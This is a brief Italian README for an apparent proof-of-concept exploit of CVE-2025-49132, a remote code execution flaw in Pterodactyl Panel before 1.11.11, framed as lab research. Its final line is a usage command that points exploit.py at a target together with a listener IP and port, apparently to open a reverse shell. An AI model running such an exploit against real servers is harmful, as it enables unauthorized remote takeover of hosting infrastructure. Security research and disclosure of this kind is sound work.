
Questo script sfrutta la vulnerabilità di Esecuzione Remota di Codice in Pterodactyl Panel < 1.11.11
Questo repository contiene un Proof of Concept (PoC) per CVE-2025-49132, una vulnerabilità di Remote Code Execution (RCE) che interessa Pterodactyl Panel < 1.11.11
Questo PoC è stato sviluppato e testato in un ambiente di laboratorio controllato per scopi di ricerca e formazione.
La vulnerabilità origina da una validazione insufficiente dell'input controllato dall'utente in un gestore di richieste, che consente interazioni indesiderate con il backend.
In determinate condizioni, ciò può portare all'esecuzione remota di comandi.
python3 exploit.py -t <target> -l <listener_ip> -p <listener_port>